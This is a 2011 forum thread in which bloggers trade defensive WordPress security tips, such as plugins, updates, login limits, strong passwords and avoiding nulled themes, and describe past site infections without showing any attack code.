1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security for wordpress

Discussion in 'Blogging' started by mindmaster, Feb 22, 2011.

  1. mindmaster

    mindmaster Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2010
    Messages:
    2,501
    Likes Received:
    1,135
    Location:
    at my new office
    What is your best bet for security for wordpress?
    What plugins do you use/recommend?

    So far I am working with: AskApache Password Protect, WP Security Scan and for spam protection Akismet.
     
  2. ScrapeBoss

    ScrapeBoss Elite Member Premium Member

    Joined:
    Nov 25, 2010
    Messages:
    1,865
    Likes Received:
    669
    Location:
    123.456.789.012.345.678.901.234.567
    Home Page:
    You can also install the Firewall plugin. It prevents unauthorized modification of sensitive files. You also need to whitelist your IP address or else the plugin will prevent you (the site owner) from playing with those files.
     
  3. Bross

    Bross Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    859
    Likes Received:
    355
    Looks like you need to relax a bit...
     
  4. k4sper

    k4sper Registered Member

    Joined:
    Feb 4, 2011
    Messages:
    71
    Likes Received:
    8
    Exactly, I don't see the point to install any security plugins.
     
  5. Yukinari84

    Yukinari84 Elite Member

    Joined:
    Dec 12, 2007
    Messages:
    2,474
    Likes Received:
    4,665
    Occupation:
    I'm retired ;p
    Location:
    Somewhere in space...
    WP is pretty secure right out of the box, and unless your sites have high value for a hacker, you should be ok.

    However, if you are concerned, just Google " best wordpress security plugins" and you will get a lot of good info and recommendations.
     
  6. slick

    slick Newbie

    Joined:
    Feb 22, 2008
    Messages:
    10
    Likes Received:
    18
    I like "TAC" theme authenticity checker. Great for checking the links in your theme that may be calling home.
     
  7. darkdk

    darkdk Newbie

    Joined:
    Dec 1, 2009
    Messages:
    27
    Likes Received:
    5
    For the most part, I do not have any extra Wordpress security.

    I recommend firstly upgrading to the newest Wordpress every new release. Secondly, I recommend also installing a plugin called Limited Login Attempts, which will block a user from logging into your Wordpress after X amount of failed login attempts. You can even get an email alert sent to you about this. It's decent protection against basic password cracking attempts.

    Another option can be to use HTACCESS to block all IPs but your own from accessing the adminsitrative area of Wordpress. Just a thought, anyway. It could present problems though if you want to access it from a different location.
     
  8. sbw27

    sbw27 Regular Member

    Joined:
    Jan 6, 2008
    Messages:
    390
    Likes Received:
    441
    All the munters telling you to relax don't know what they are talking about. Wordpress security is a serious issue. Just this week some dick gained access to my theme files and installed a malware script into my footer....got me listed in google as being dangerous...I got it removed pretty fast, but it would have cost me a day worth of sales. My site also got infected by the Pharma hack....basically a hack that fills you database full of BS posts with links to other pages about pharmaceutic products...but the pages are only viewable to search engines....nasty stuff and hard to clean up. this stuff can cause your income and business serious damage.
     
  9. TNphoneman

    TNphoneman Senior Member

    Joined:
    Dec 15, 2010
    Messages:
    1,177
    Likes Received:
    695
    yea mine got hit this week also. It placed links in the index.php. when you viewed the source in the browser it was after the /body and /html tags.
     
  10. darkdk

    darkdk Newbie

    Joined:
    Dec 1, 2009
    Messages:
    27
    Likes Received:
    5
    That's pretty rough. I feel very lucky and very fortunate to not have been attacked by any such thing just yet.

    Which reminds me of yet another security suggestion for Wordpress!

    Though this won't block any mass defacements from worms and so forth that know what they are doing, I highly suggest removing the Wordpress version information from your header. For instance, it may look like the following at the moment:

    HTML:
    <meta name="generator" content="WordPress 3.1" />
    This tells visitors or malicious users that you are not only running WordPress, but specifically version 3.1, which is what some defacement tools look for when doing version-specific vulnerability attacks.

    Just a thought, anyway.
     
  11. ADHD-Dude

    ADHD-Dude Power Member

    Joined:
    Apr 17, 2010
    Messages:
    592
    Likes Received:
    119
    Why would you want do such a thing? it uses more server resources, don't do it only noobs fear that someone will hack a useless, no good blog.
     
  12. bavahz

    bavahz Registered Member

    Joined:
    Nov 26, 2008
    Messages:
    65
    Likes Received:
    103
    Occupation:
    marketing rep
    Location:
    Milwaukee area
    Checkout John Hoff's
    Secureblog product "Word press defender"
    Code:
    http://securemyblog.com/
    no affl but looks promising and I heard good rep
     
  13. roberteb

    roberteb Regular Member

    Joined:
    Oct 30, 2010
    Messages:
    402
    Likes Received:
    120
    Location:
    UK
    I disagree. Security for WP and anything you have on line is something you want to take serriously. Not only can it cost you money, your reputation but also a lot of time trying to put it right and shut the door.

    Common sense will tell you that the first thing you need to secure is your PC. Make sure you have a decent virus scanner and that it's up to date. If you get a trojan or keyboard logger on your machine changing your passwords is going to do no good as the hacker will have the new one as well.

    For WP make sure:

    1) Your password is a decent length and has special characters I use Roboform to generate passwords that are at least 16 chars long.
    2) Change the default user ID from admin to something else like ytiiyt56 makes it harder to bruteforce.
    3) Install latest version (I like to wait a week or so after new release unless it's a security patch.
    4) Disable anonymous FTP on host.
    5) Have good FTP passwords see (1)
    6) If you can use SFTP
    7) Don't install free / nulled themes unless you know how to check the code
    8) Don't install nulled Plugins unless 7)
    9) Check HTML of anything that automatically posts

    The above is the minimum you should be doing and lets face it fairly easy to do.

    Good security is a mindset not a single event and thinking defensively will save you time, trouble and money in the long run.
     
    • Thanks Thanks x 1
  14. Markbh

    Markbh Regular Member

    Joined:
    Jul 8, 2010
    Messages:
    224
    Likes Received:
    1,103
    Occupation:
    Freelance Marketing Consultant
    Location:
    High Seas
    I would also recommend a free, yet quite effective plugin - WP Secure.
    It's available here
    HTML:
    http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ 
     
  15. darkdk

    darkdk Newbie

    Joined:
    Dec 1, 2009
    Messages:
    27
    Likes Received:
    5
    I don't usually go purely by ratings but...

    Less than 2.5 stars from 6 votes just seems very low...And the comments on the slide are a little iffy :) I haven't used it before so these are just observations.
     
  16. m0nster

    m0nster Senior Member

    Joined:
    Oct 20, 2010
    Messages:
    1,044
    Likes Received:
    1,003
    Occupation:
    Offline Marketing
    Location:
    USA
    ok

    really? damn. i always seem to trust pirates right off the bat :(
     
  17. RandomPhantom

    RandomPhantom Junior Member

    Joined:
    Nov 7, 2008
    Messages:
    124
    Likes Received:
    21
    Sounds like a nice plugin. I dont use any kind of security plugins on my 50+ blogs. Maybe its time to do something about that.. :rolleyes:
     
  18. SalonSpaSource

    SalonSpaSource Registered Member

    Joined:
    Dec 31, 2009
    Messages:
    58
    Likes Received:
    6
    If you are more concern about security, other than blogging I suggest you to get PCI compliance for your domain.
    That will make you more relax, coz then after no need to worry about your data, as they scan all data periodically.
    below are some suggestive websites.
    trustwaveonline.com
    trustwave.com